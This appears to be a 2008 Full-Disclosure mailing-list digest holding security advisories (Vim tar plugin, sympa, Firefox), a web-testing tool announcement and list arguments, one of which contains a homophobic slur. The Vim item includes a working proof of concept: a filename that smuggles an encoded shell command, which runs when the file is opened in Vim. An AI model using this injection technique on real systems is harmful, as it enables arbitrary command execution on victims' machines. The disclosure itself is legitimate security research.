Cannot open: No such file or directory> tar: Error is not recoverable: exiting now> /bin/bash: retu: command not found> /bin/bash: bar.tar|retu|'bar.tar: command not found> > It's easy to see that it is still possible to execute arbitrary shell commands.> > $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:> > 136 if tarfile =~# '\.\(gz\|tgz\)$'> 137 " call Decho("1: exe silent r! gzip -d -c> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd." -".g:tar_browseoptions." - "> 139 elseif tarfile =~# '\.lrp'> 140 " call Decho("2: exe silent r! cat --> ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."> -".g:tar_browseoptions." - ")> *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c> -|".g:tar_cmd." -".g:tar_browseoptions." - "> 142 elseif tarfile =~# '\.bz2$'> 143 " call Decho("3: exe silent r! bzip2 -d -c> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd." -".g:tar_browseoptions." - "> 145 else> 146 " call Decho("4: exe silent r! ".g:tar_cmd."> -".g:tar_browseoptions." ".s:Escape(tarfile))> **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."> ".s:Escape(tarfile)> [...]> 444 fun s:Escape(name)> 445 " shellescape() was added by patch 7.0.111> 446 if exists("*shellescape")> 447 let qnameq= shellescape(a:name)> 448 else> 449 let qnameq= g:tar_shq . a:name . g:tar_shq> 450 endif> 451 return qnameq> 452 endfun> > (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.> > (**) tar(1) allows arbitrary command execution via options ``--to-command'',> and ``--use-compress-program''.> > > The updated tarplugin attack is rather simple:> > $ rm -rf ./*> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |> xxd -r\`;'bar.tar"> $ vim +:q ./foo*> $ ls -l pwned> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned> > Cheers,> Jan Minar.> > > > ------------------------------> > Message: 6> Date: Tue, 1 Jul 2008 21:25:39 +0100> From: Steve Kemp > Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages> fix denial of service> To: debian-security-announce at lists.debian.org> Message-ID: <20080701202539.GA32605 at steve.org.uk>> Content-Type: text/plain; charset=us-ascii> > -----BEGIN PGP SIGNED MESSAGE-----> Hash: SHA1> > - ------------------------------------------------------------------------> Debian Security Advisory DSA-1600-1 security at debian.org> http://www.debian.org/security/ Steve Kemp> July 01, 2008 http://www.debian.org/security/faq> - ------------------------------------------------------------------------> > Package : sympa> Vulnerability : dos> Problem type : remote> Debian-specific: no> CVE Id(s) : CVE-2008-1648> Debian Bug : 475163> > It was discovered that sympa, a modern mailing list manager, would> crash when processing certain types of malformed messages.> > For the stable distribution (etch), this problem has been fixed in version> 5.2.3-1.2+etch1.> > For the unstable distribution (sid), this problem has been fixed in> version 5.3.4-4.> > We recommend that you upgrade your sympa package.> > > Upgrade instructions> - --------------------> > wget url> will fetch the file for you> dpkg -i file.deb> will install the referenced file.> > If you are using the apt-get package manager, use the line for> sources.list as given below:> > apt-get update> will update the internal database> apt-get upgrade> will install corrected packages> > You may use an automated update by adding the resources from the> footer to the proper configuration.> > > Debian GNU/Linux 4.0 alias etch> - -------------------------------> > Source archives:> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc> Size/MD5 checksum: 625 c7e720e56b1c4e9778cea822ed150a19> http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz> Size/MD5 checksum: 96804 a93d8ec3dcbc0a0aed99e513c5749c0e> http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz> Size/MD5 checksum: 5102528 355cb9174841205831191c93a83da895> > alpha architecture (DEC Alpha)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb> Size/MD5 checksum: 3589148 26b92215ed7b17531c3702ff76b30901> > amd64 architecture (AMD x86_64 (AMD64))> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb> Size/MD5 checksum: 3591854 531781d522ad5f02e6c5b658883ed37d> > arm architecture (ARM)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb> Size/MD5 checksum: 3590606 dc3437760b7db4761f90e992e3638c52> > hppa architecture (HP PA RISC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb> Size/MD5 checksum: 3591482 5601933860831577cb017cb0aa3b31fe> > i386 architecture (Intel ia32)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb> Size/MD5 checksum: 3567454 0c6e3d6046f7d0e9920ed7ce9780b103> > ia64 architecture (Intel ia64)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb> Size/MD5 checksum: 3571256 c294184494968264ff0857fc2b907711> > mips architecture (MIPS (Big Endian))> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb> Size/MD5 checksum: 3584362 1b3371fe22966b198a3c338167e71909> > powerpc architecture (PowerPC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb> Size/MD5 checksum: 3568314 57c566c13cd31f66bbe3652b4c9ea3e7> > s390 architecture (IBM S/390)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb> Size/MD5 checksum: 3568574 afab57a71590dcdd685746b6500040b0> > sparc architecture (Sun SPARC/UltraSPARC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb> Size/MD5 checksum: 3568016 0bf312e31bb5df28404ea40842845caf> > > These files will probably be moved into the stable distribution on> its next update.> > - ---------------------------------------------------------------------------------> For apt-get: deb http://security.debian.org/ stable/updates main> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main> Mailing list: debian-security-announce at lists.debian.org> Package info: `apt-cache show ' and http://packages.debian.org/> -----BEGIN PGP SIGNATURE-----> Version: GnuPG v1.4.6 (GNU/Linux)> > iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S> 6REh7OX9zxqgWYGHqQWtEpQ=> =ANTa> -----END PGP SIGNATURE-----> > > > ------------------------------> > Message: 7> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)> From: Michal Zalewski > Subject: [Full-disclosure] [tool] ratproxy - passive web application> security assessment tool> To: bugtraq at securityfocus.com, websecurity at webappsec.org> Cc: full-disclosure at lists.grok.org.uk> Message-ID: > Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed> > Hi all,> > I am happy to announce that we've just open sourced ratproxy - a free, > passive web security assessment tool. This utility is designed to > transparently analyze legitimate, browser-driven interactions with tested > web applications - and automatically pinpoint, annotate, and prioritize > potential flaws or areas of concern on the fly.> > The proxy analyzes problems such as cross-site script inclusion threats, > insufficient cross-site request forgery defenses, caching issues, > potentially unsafe cross-domain code inclusion schemes and information > leakage scenarios, and much more.> > For a detailed discussion of the utility, please visit:> http://code.google.com/p/ratproxy/wiki/RatproxyDoc> > Source code is available at:> http://code.google.com/p/ratproxy/downloads/list> > And finally, screenshot of a sample report can be found here:> http://lcamtuf.coredump.cx/ratproxy-screen.png> > The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since > it is in beta, there might be some kinks to be ironed out, and not all web > technologies might be properly accounted for. Feedback is appreciated.> > Please keep in mind that the proxy is meant to highlight interesting > patterns in web applications; a further analysis by a security > professional is required to interpret the significance of results for a > particular platform.> > Cheers,> /mz> > > > ------------------------------> > Message: 8> Date: Wed, 2 Jul 2008 02:19:01 -0300> From: "Filipe Balestra" > Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1"> > mrdkaaa,> > are you saying that this vulnerability is not new to the public?> > The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One program can have a lot of vulnerabilities :) > > But yes, this vulnerability is at least four years old, but was not public.> > Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?> > p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.> > Cheers,> > Filipe Alcarde Balestra> -------------- next part --------------> An HTML attachment was scrubbed...> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html > > ------------------------------> > Message: 9> Date: Wed, 2 Jul 2008 08:29:43 +0200> From: Tonnerre Lombard > Subject: Re: [Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To: staff at lul-disclosure.net> Cc: full-disclosure at lists.grok.org.uk> Message-ID: <20080702082943.2811aba5 at wssyg117.sygroup-int.ch>> Content-Type: text/plain; charset="iso-8859-1"> > Salut,> > On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi cant> > steal your money or eat your lunches? Where you can freely submit> > lulz to be published? Where Theo's defeat and denial are brought to> > light? Wait no more!> > You mean a site which evidently cannot tell the difference between> local and remote root vulnerabilities? (The local root exploit for> obsd4 which is published on that site contains a patch to increment the> count of _remote_ vulnerabilities on the obsd web site.)> > Tonnerre> -- > SyGroup GmbH> Tonnerre Lombard> > Solutions Systematiques> Tel:+41 61 333 80 33 G?terstrasse 86> Fax:+41 61 383 14 67 4053 Basel> Web:www.sygroup.ch tonnerre.lombard at sygroup.ch> -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 835 bytes> Desc: not available> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin > > ------------------------------> > Message: 10> Date: Tue, 01 Jul 2008 21:47:36 +0200> From: DeepSec 2008 > Subject: [Full-disclosure] Deepsec Talks 2007 are online -> registration for 2008 is open> To: full-disclosure at lists.grok.org.uk> Message-ID: <486A89D8.2000303 at deepsec.net>> Content-Type: text/plain; charset=UTF-8; format=flowed> > Dear Madam, dear Sir,> > DeepSec Vienna, the annual In-Depth Security Conference has opened> online registrations for 2008. Registrations will receive a discount> of 5% off the regular fees until August 31st if you use the following> promotional code: earlybird-L4KZIEUE on our online registration form> at https://deepsec.net/register/> > Videos from 2007 are online:> > Also we are happy to announce that talks from last years conference> are online. Listen to last years talks in full length at:> http://video.google.com/videosearch?q=deepsec&sitesearch=#> > Call for Papers still Open for two weeks:> > If you have some good ideas for a Talk at the conference and haven't> decided yet to submit we encourage you to do so now. We still accept> submissions at https://deepsec.net/cfp/ or via e-mail to:> cfp at deepsec.net> > > We hope to hear from you and of course to meet in Vienna in November!> > Best Regards,> > Paul B?hm,> Ren? Pfeiffer,> Michael Kafka> DeepSec GmbH> > > -- > DeepSec In-Depth Security Conference> November 11nd to 14th 2008, Vienna, Austria> https://deepsec.net/> > > > ------------------------------> > Message: 11> Date: Wed, 02 Jul 2008 04:08:38 -0300> From: root > Subject: Re: [Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To: staff at lul-disclosure.net> Cc: full-disclosure at lists.grok.org.uk> Message-ID: <486B2976.8000708 at fibertel.com.ar>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed> > You couldn't do the remote exploit even with a google video documenting > it step by step.> More like fail-disclosure.> > staff wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal> > your money or eat your lunches? Where you can freely submit lulz to be> > published? Where Theo's defeat and denial are brought to light? Wait no> > more!> > > > http://lul-disclosure.net/> > > > WhiteHat? BlackHat? We are lulzhat.> > Fuck you and your hats.> > > > > > > > ------------------------------------------------------------------------> > > > _______________________________________________> > Full-Disclosure - We believe in it.> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia - http://secunia.com/> > > > ------------------------------> > _______________________________________________> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/> > End of Full-Disclosure Digest, Vol 41, Issue 3> **********************************************unsubscribe _________________________________________________________________ Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy! http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/3137d1ac/attachment.html From jamie at canonical.com Wed Jul 2 13:45:38 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Wed, 2 Jul 2008 08:45:38 -0400 Subject: [Full-disclosure] [USN-619-1] Firefox vulnerabilities Message-ID: <20080702124538.GM11562@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-619-1 July 02, 2008 firefox vulnerabilities CVE-2008-2798, CVE-2008-2799, CVE-2008-2800, CVE-2008-2801, CVE-2008-2802, CVE-2008-2803, CVE-2008-2805, CVE-2008-2806, CVE-2008-2807, CVE-2008-2808, CVE-2008-2809, CVE-2008-2810, CVE-2008-2811 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1 Ubuntu 7.04: firefox 2.0.0.15+0nobinonly-0ubuntu0.7.4 Ubuntu 7.10: firefox 2.0.0.15+1nobinonly-0ubuntu0.7.10 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Various flaws were discovered in the browser engine. By tricking a user into opening a malicious web page, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2798, CVE-2008-2799) Several problems were discovered in the JavaScript engine. If a user were tricked into opening a malicious web page, an attacker could perform cross-site scripting attacks. (CVE-2008-2800) Collin Jackson discovered various flaws in the JavaScript engine which allowed JavaScript to be injected into signed JAR files. If a user were tricked into opening malicious web content, an attacker may be able to execute arbitrary code with the privileges of a different website or link content within the JAR file to an attacker-controlled JavaScript file. (CVE-2008-2801) It was discovered that Firefox would allow non-privileged XUL documents to load chrome scripts from the fastload file. This could allow an attacker to execute arbitrary JavaScript code with chrome privileges. (CVE-2008-2802) A flaw was discovered in Firefox that allowed overwriting trusted objects via mozIJSSubScriptLoader.loadSubScript(). If a user were tricked into opening a malicious web page, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2803) Claudio Santambrogio discovered a vulnerability in Firefox which could lead to stealing of arbitrary files. If a user were tricked into opening malicious content, an attacker could force the browser into uploading local files to the remote server. (CVE-2008-2805) Gregory Fleischer discovered a flaw in Java LiveConnect. An attacker could exploit this to bypass the same-origin policy and create arbitrary socket connections to other domains. (CVE-2008-2806) Daniel Glazman found that an improperly encoded .properties file in an add-on can result in uninitialized memory being used. If a user were tricked into installing a malicious add-on, the browser may be able to see data from other programs. (CVE-2008-2807) Masahiro Yamada discovered that Firefox did not properly sanitize file URLs in directory listings, resulting in files from directory listings being opened in unintended ways or not being able to be opened by the browser at all. (CVE-2008-2808) John G. Myers discovered a weakness in the trust model used by Firefox regarding alternate names on self-signed certificates. If a user were tricked into accepting a certificate containing alternate name entries, an attacker could impersonate another server. (CVE-2008-2809) A flaw was discovered in the way Firefox opened URL files. If a user were tricked into opening a bookmark to a malicious web page, the page could potentially read from local files on the user's computer. (CVE-2008-2810) A vulnerability was discovered in the block reflow code of Firefox. This vulnerability could be used by an attacker to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2811) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1.diff.gz Size/MD5: 178465 555be79fadaec3dbe6467f9b07e58a33 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1.dsc Size/MD5: 1156 12b3c9c93624d0636b1999bb076a4f04 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c.orig.tar.gz Size/MD5: 46649317 5f471b387fb508342ee6feaf13bef0ef Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_all.deb Size/MD5: 53392 fadd8096c4f2a7aba95bca64c702a3df http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_all.deb Size/MD5: 52502 2a0814339a45213c263d5be797e90d17 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 47631018 353761ca872d4c3b30ab0da2ebd0e4c4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 2857612 1edf737f7de184fddad3bd52ff565a09 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 85794 9eed693c2f22028bbfca48183871a6d1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 9485396 5bcd954da3b95453fb40b9e57cba61f2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 222088 0383888aa9d2bcfac30f3a5e7130a90d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 165606 f0dcfea398b5f8e0bedad9a2568f178f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 247604 cc07e4a502c8a4e106d460c995dcd00d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 825272 958ec3b985dd4f80e76bbd8e683ceca6 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_amd64.deb Size/MD5: 218312 c3a813f2384f2340cdf1359ba9886280 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 44176266 8c3dad7066a8112e1a844d72bdd4677b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 2857614 67b087abcfad2910ad4e4665659887df http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 78104 eb7e30f9afb0ddd7be10f86b30158776 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 7990736 6d3225d6b9fb91bb80b7ce3c6bf98821 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 222074 d25799f7207fb94d2f4bc0b787137d35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 150094 37c932bf0810c779e99be8d59c66c8bf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 247578 3032e3dba84a337686f93de81b448bda http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 716862 3dea2b38a5356ef6011e088309b3780c http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_i386.deb Size/MD5: 211516 74fcf2d7d9323e88fcf1d00391d42022 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 49021298 1018117974b9d940f13b67f4455487f5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 2857658 323883e64579ca01ea2e94bd3c582a6e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 81226 8a08dc6223120f55dc27868ce95e13e2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 9104582 7254f446ee8eeb4501267dbe05d87398 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 222090 e3c2905b8089a40c80ed7daacc374832 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 162812 ed733d65aefc4376e1bcd9009944a815 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 247608 cdf0244cf4f9c1a8d6916e0456204f66 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 815874 0ad8681b309758570be1cb0e1d545d95 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_powerpc.deb Size/MD5: 215012 f4baf842ed8b8f919a2bac549b8924e3 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 45577288 0b6c5ab441ee954f81b828cd3c8c4aab http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 2857710 5ee3a2d948c6c49aad20a6c7c8203afa http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 79688 e9f710ea29500741a186c6071b31ed6f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 8488606 1162d5cb31f3cce528dcda4feb295607 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 222094 27fc4ca2dd30ef38351d1ba456f2bc00 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 152706 29085a3e043b18144abfa1c757a40b78 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 247592 ad46ad5c7e21689ea205fbd5939a440c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 727318 596d2d793086498e4077e70a00b34da5 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614c-0ubuntu1_sparc.deb Size/MD5: 212466 e24de9effd9cede6b1c0951d634e129b Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4.diff.gz Size/MD5: 314849 7c070836265cf8aabe1bfef4215198cf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4.dsc Size/MD5: 1224 4b83295a1f8683361862c04cb701389c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly.orig.tar.gz Size/MD5: 48622119 b79f810df400c94ff5c9726b1920ce2d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.15+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 243526 8b2a97df9058941dd805c7a7c5b832e8 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 58870 3985c983eb55ca1fb074ab905838109b http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.15+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 58968 d7085239b5519dd6a031d79287b9dc1f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 58976 5295e96f46aeb67690ae6a012e4b58f2 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 59778 39490eeb9d587cb032606c926dd0cb70 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 50651918 ffb4d840e826ab7d93a8fee099995fc8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 3186110 065b21cf769f95b6a4c54a45eca68b0e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 92688 1909d98aca246f219ccbe722879c61aa http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 62684 31f0bf3db936d2c3d88dcf31130b406e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 10486520 662aa1a55a9c9126f00e161acaa06143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 228846 c06d95261a00257c1d585281a6ba31d7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 174366 bed6cb9c880507b290faf0332db1717c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 254936 e113790e50610566ddf6c1c94f964b3e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_amd64.deb Size/MD5: 888168 0fe2f646e715adcc0f3e75253c331bb6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 49787920 b63b40a508cb5bfbbf53059be10d8391 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 3177264 9f821bade8d63783a367f82328673d87 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 86906 b9c62c2432f49db6b851b8dc807da17d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 62092 